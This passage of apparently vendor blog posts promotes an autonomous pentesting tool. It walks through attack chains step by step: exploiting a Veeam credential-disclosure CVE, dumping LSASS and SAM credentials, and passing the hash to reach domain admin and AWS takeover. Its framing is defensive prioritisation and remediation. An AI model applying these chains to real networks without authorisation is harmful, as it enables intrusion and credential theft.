    2. Use the netsh command line utility to import the RPC filter from an elevated administrator prompt:
      netsh -f <FILTER_FILE_NAME>
    3. To confirm the filters are in place, you can view the current RPC filters using the following command:
      netsh rpc filter show filter

See CERT Coordination Center Vulnerability Note VU#405600 for additional details on protecting Active Directory Certificate Services from NTLM relay attacks.


You Can’t Manage Risk if You Lack Context

29 June 2023 at 16:50

Low-Level Vulnerability Leads to Domain Compromise

Although vast numbers of organizations purchase and utilize some sort of vulnerability management solution and may perform in-house penetration tests on their own networks, most struggle with knowing what not to fix because they lack context about what is truly exploitable. As a result, organizations spend vast amounts of time fixing issues that are of minimal risk.

There is a considerable difference between being vulnerable and being exploitable, and lacking context is an enormous challenge most organizations face. In many cases, organizations are using some sort of assessment tool that labels their findings with CVSS scores, but often they are of little use since these scores are primarily used to measure severity—and are not used to measure “your” risk. Severity refers to the seriousness of an issue, but risk refers to the possibility of loss or injury. If something is seen as not being severe, how much risk can really be involved? Lots.

It’s become all too clear that a more advanced pentesting approach is the only viable way to unravel the two questions that follow:

  1. How do we determine the difference between weaknesses that make our organization vulnerable vs. weaknesses that make us exploitable?
  2. How do we accurately prioritize each occurrence of a vulnerability finding based on its downstream impacts, and what should we fix first?

Let’s look at an example

An SMB Signing Not Required finding is a notable example: it carries a low-severity CVSS score (~5.0) but can still pose substantial risk. The finding elevates risk because an unauthenticated, remote attacker could potentially exploit it to conduct man-in-the-middle attacks. Most people believe these attacks are difficult to pull off, but that is not always the case. Remember, risk is all about the possibility of loss or injury.

Although SMB Signing Not Required has a low CVSS score, a savvy attacker can chain this misconfiguration together with other issues and become a Domain Administrator, compromise hosts and users, and/or gain access to sensitive data. And even worse, a run-of-the-mill vulnerability scanner will classify all occurrences of SMB Signing Not Required as “low” because vulnerability scanners lack the attacker’s perspective and provide little, if any context.

How is NodeZero™ different?

NodeZero is the industry’s first fully autonomous pentesting platform and is far more advanced than your typical vulnerability scanner. NodeZero will utilize each occurrence of an issue in an attack path, then it will accurately score each occurrence of that weakness based on its downstream impacts (see Figure 1), capturing the proof of exploitation along the way. In this example, NodeZero:

  1. Provides a true vulnerability SCORE
  2. Supplies the NodeZero WEAKNESS ID
  3. Delivers context into the number of DOWNSTREAM IMPACTS
  4. Shows all potential ATTACK PATHS
  5. Provides TIME TO DISCOVER
  6. And allows the user to select and view PROOFS

When looking at the SCORE column in Figure 1, we see that this risk is a 10+. Then when looking at the DOWNSTREAM IMPACT column, the at-risk hosts are exploitable to one or more of the following outcomes:

  • Domain Compromise
  • Host Compromise
  • Domain User Compromise

And according to NodeZero, there are at least 73 attack paths where this vulnerability could be exploited. This is what we mean by "context-based scoring," which is much different from a CVSS score.
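To make the distinction concrete, here is a toy context-adjusted score. This is purely illustrative and is not NodeZero's actual scoring algorithm; the impact weights are invented. The idea is that a base CVSS of ~5.0 escalates once downstream impacts like domain compromise are reachable:

```python
# Toy model only -- NOT NodeZero's real algorithm. Weights are invented.
IMPACT_WEIGHTS = {"domain_compromise": 5.0, "host_compromise": 3.0, "user_compromise": 2.0}

def context_score(cvss_base, impacts):
    """Raise a base severity score by the downstream impacts proven reachable."""
    score = cvss_base + sum(IMPACT_WEIGHTS.get(i, 0.0) for i in impacts)
    return min(score, 10.0)  # cap, mirroring the "10+" shown in the report

# SMB Signing Not Required: low base CVSS, but exploitable downstream.
smb = context_score(5.0, ["domain_compromise", "host_compromise", "user_compromise"])
```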

Figure 1

NodeZero has proven that a low severity issue suddenly has an extremely elevated risk of exploitation because it knows it could exploit these vulnerabilities and achieve domain, host, and/or user compromise.

Security teams now get context on what to prioritize

Once a security team receives the results from a NodeZero pentest, they understand what to prioritize for remediation. When they have remediated the issues at hand, they normally want to verify that they have properly fixed each occurrence of the issue.

Rather than having to rerun the entire pentest, security teams can select the specific occurrences they want to test and execute a “retesting” workflow on NodeZero, which is a narrowly scoped pentest that only checks for those specific weaknesses. Not only do they immediately know what to fix, they can also prove that their fix was effective. This is a valuable time-saving feature.

Key takeaway

Context-based scoring on downstream impacts, combined with our retesting workflow, is one of the most used features within NodeZero. This enables organizations to accurately prioritize fixing security weaknesses that can be exploited, then quickly verifying that the detected issues have been remediated. In all reality, context into risk is what matters most.


Veeam CVE Leads to Full Compromise

26 July 2023 at 18:15

Recent CVE Affecting Veeam Backup Software Leads to Domain and AWS Takeover

Veeam Backup and Replication software is commonly used by enterprises for data protection and ransomware recovery. Earlier this year a vulnerability affecting Veeam, CVE-2023-27532, was disclosed. This vulnerability enables attackers to dump highly privileged credentials used by Veeam for backup operations.

NodeZero has been able to successfully exploit the Veeam CVE in many environments. In the example below, NodeZero leveraged the Veeam vulnerability to fully compromise a client’s on-prem environment and AWS infrastructure.

To be clear, the attack paths that NodeZero discovers are completely valid paths that an attacker could take, and following them can lead to complete compromise. This is a real attack performed by NodeZero with no human penetration testers involved. The attack was executed safely against production systems that were not in a lab environment.

Attack Path #1: The Path to Domain Compromise

In this attack path, NodeZero leveraged 4 weaknesses, including the recent Veeam CVE, to become domain admin. The attack path involved 2 compromised credentials and spanned 4 hosts.

NodeZero started off as an unauthenticated member of the internal network. Then:

  1. NodeZero was launched from host x.x.x.x on ~Jun 19
  2. NodeZero discovered the Veeam Backup and Replication service running in the environment on port 9401.
  3. NodeZero identified that the Veeam service is vulnerable to CVE-2023-27532 (Veeam Backup and Replication Credential Disclosure Vulnerability). NodeZero exploited the vulnerability to dump cleartext credentials from Veeam.
  4. One of the credentials NodeZero acquired from Veeam is for a domain user, service1. NodeZero verified service1’s credential by logging into the domain domain1 as that user over SMB.
  5. NodeZero discovered that service1 has local Administrator privileges on a Windows machine, machine1. NodeZero raised a new weakness, H3-2022-0086: Domain User with Local Administrator Privileges.
  6. Logged in as service1 on machine1, NodeZero dumped credentials (NTLM hashes) for all local users from the Security Account Manager (SAM) database. NodeZero raised a weakness H3-2021-0042: Credential Dumping – Security Account Manager (SAM) Database
  7. One of the NTLM hashes NodeZero acquired from the SAM dump on machine1 is for a local user admin1. Using a Pass-the-Hash attack, NodeZero discovered that the credential for admin1 also happens to be a domain user on domain1. NodeZero raised a weakness H3-2022-0085: Credential Reuse – Shared Windows Local User and Domain User Accounts
  8. NodeZero further identified that domain user admin1 is a domain admin.

In other words, NodeZero proved it could become a domain admin and takeover all machines connected to the domain in approximately 2.5 hours. Figure 1 highlights this attack path.

Figure 1

Attack Path #2: The Path to AWS Compromise

Now let’s look at another attack path in the same environment that led to full AWS account compromise via the same Veeam CVE.

  1. NodeZero was launched from host x.x.x.x on ~Jun 19
  2. NodeZero discovered CVE-2023-27532: Veeam Backup and Replication Credential Disclosure Vulnerability affecting the MC-NMF service on Veeam1 port 9401
  3. NodeZero discovered an AWS Access Key XXXXXXXXXXXXXXXXXXXX on the MC-NMF service on Veeam1 port 9401 by exploiting CVE-2023-27532: Veeam Backup and Replication Credential Disclosure Vulnerability
  4. NodeZero verified the credential for AWS admin user aws1 in AWS account xxxxxxxxxxxx on AWS STS (Security Token Service)

NodeZero executed the attack path in Figure 2 in about 1 hour and 20 minutes. NodeZero would go on to compromise other AWS accounts this organization used with the same credential.

Figure 2

Key Takeaways

The attack path examples above highlight the value of autonomous pentesting.

One of the interesting aspects of the Veeam CVE is that it is rated as a 7.5 (High) by the National Vulnerability Database (NVD). In many organizations, this vulnerability would not be prioritized for patching relative to other Critical-level vulnerabilities. The reality, as proven here by NodeZero, is that exploiting this vulnerability can lead to full compromise. NodeZero can be used to assess the true impact of a vulnerability in any environment.

In addition to the Veeam CVE, NodeZero also identified and exploited other important weaknesses common in many environments: over-privileged domain users, insufficient EDR controls to prevent credential dumping, and credential reuse. In the attack path to domain compromise, the Veeam CVE provided NodeZero initial access, and the subsequent weaknesses enabled NodeZero to take over the domain. NodeZero performed the same actions a human pentester would by chaining multiple weaknesses together to arrive at the greatest impact possible.


Low-Level Credentials Can Get Big Gains

26 July 2023 at 18:15

Combining Compromised Credentials Enables Domain Takeover

When running internal phishing campaigns to help train employees, one challenge IT security teams face is explaining to leaders, “why the credentials of an intern (or whatever level employee) are valuable to attackers.” The common pushback security teams normally hear is, “They are an intern. They do not have access to anything critical, so why is it so important?”

Demonstrating how an intern’s credentials, combined with other issues, could lead to a domain compromise, sensitive data exposure, or other critical impacts is not an easy task when organizations do not have something like NodeZero™ on hand.

A credential injection test

A terrific way for security teams to tell the end-to-end story to leaders is to “inject” a low-level user’s credentials into a running NodeZero penetration test. NodeZero will then use those credentials as it identifies ways to compromise the environment.

Below is an example of a real attack performed by NodeZero with no human penetration testers or red teams involved. NodeZero started with the privileges of a low-level domain user and ultimately ended up fully compromising the domain. The attack was executed safely against production systems that were not in a lab environment.

Attack Path to Domain Compromise
  1. In this case, NodeZero started out as an authenticated member of the internal network. NodeZero was given the credential for domain user user1.
  2. NodeZero verified the credential for domain user user1 in domain domain1 over SMB.
  3. NodeZero discovered that user1 has local Administrator privileges on a Windows machine, machine1. NodeZero raised a new weakness, H3-2022-0086: Domain User with Local Administrator Privileges.
  4. Logged in as user1 on machine1, NodeZero dumped credentials from LSASS memory. NodeZero raised a weakness H3-2021-0044: Credential Dumping – Local Security Authority Subsystem Service (LSASS) Memory.
  5. Among the credentials dumped from LSASS memory on machine1 is the NTLM hash for domain user user2. Using a Pass-The-Hash attack, NodeZero verified the credential for user2 against domain1 over SMB.
  6. NodeZero discovered that user2 has local Administrator privileges on another Windows machine, machine2. NodeZero raised a new weakness, H3-2022-0086: Domain User with Local Administrator Privileges.
  7. Logged in as user2 on machine2, NodeZero again dumped credentials from LSASS memory. NodeZero raised a weakness H3-2021-0044: Credential Dumping – Local Security Authority Subsystem Service (LSASS) Memory.
  8. Among the credentials dumped from LSASS memory on machine2 is the NTLM hash for domain user admin1. Using a Pass-The-Hash attack, NodeZero verified the credential for admin1 against domain1 over SMB.
  9. NodeZero further identified that domain user admin1 is a domain admin.
How can this work?


  • A domain user also has local admin rights.
  • With local admin rights an attacker can access sensitive processes like LSASS.

LSASS stores credentials in memory for users active on the machine. The purpose of keeping these credentials in memory is a form of single sign-on, so the user does not have to re-enter credentials for network resources, shares, or services within the domain.

Once LSASS is dumped, additional credentials can be harvested and used to log into adjacent machines, where LSASS can be dumped again (and again, and again).
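The dump-and-pivot loop can be modeled as a simple graph traversal. The toy data below mirrors the attack path above (which credentials grant local admin where, and which credentials each machine's LSASS dump yields):

```python
from collections import deque

# Toy environment mirroring the attack path above.
admin_on = {"user1": {"machine1"}, "user2": {"machine2"}, "admin1": set()}
lsass_contains = {"machine1": {"user2"}, "machine2": {"admin1"}}

def pivot(start_cred):
    """Breadth-first credential pivoting: log in, dump LSASS, repeat."""
    have, visited = {start_cred}, set()
    queue = deque([start_cred])
    while queue:
        user = queue.popleft()
        # Log in everywhere this credential has local admin, dump LSASS there.
        for host in admin_on.get(user, set()) - visited:
            visited.add(host)
            for cred in lsass_contains.get(host, set()):
                if cred not in have:
                    have.add(cred)
                    queue.append(cred)
    return have

compromised = pivot("user1")   # grows from user1 to user2 to admin1
```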

It is highly likely that at some point, an LSASS dump will contain a privileged credential (e.g., Service Account, Domain Admin account, etc.)

In addition, the attacker has access to every system and data resource a compromised domain user credential has access to, unless those resources are MFA’d, but that is atypical for things like file shares and databases.

Note: Typically, EDR solutions should be able to block dumping credentials from LSASS, but in practice, the effectiveness of EDR solutions can vary widely depending on how they are configured.

The likely outcome

Something as simple as gaining a low-level employee's credentials can allow attackers to eventually become a domain admin, which means the domain is fully compromised, and all hosts, domain user accounts, data, infrastructure, and applications tied to that domain should be considered fully compromised as well. Additionally, applications running on a domain-joined machine, or any application that uses Active Directory integration to authenticate users, should be considered fully compromised too.

Attack path details taken from NodeZero

As shown in Figure 1, during the attack, NodeZero leveraged:

  • H3-2022-0086: Domain User with Local Administrator Privileges
  • H3-2021-0044: Credential Dumping – LSASS Memory
  • H3-2021-0044: Credential Dumping – LSASS Memory
  • H3-2022-0086: Domain User with Local Administrator Privileges

The attack path involved 3 compromised credentials:

  • Domain user user1 (injected into the pentest)
  • Domain user user2
  • Domain admin admin1

The attack spanned 5 hosts.

Figure 1

Key takeaway

This attack path is very common in internal pentests and is typical of the methods real-world attackers use once they have breached the perimeter. Not a single CVE was used in this attack, no humans were involved in this attack, just NodeZero pivoting with credentials and eventually becoming Domain Admin in a little over six hours. The key takeaway is to ensure the least privilege access for users. Domain users having local admin privileges is what led to LSASS dumping twice in this case. In addition, tuning EDR solutions to detect and block credential dumping can help.
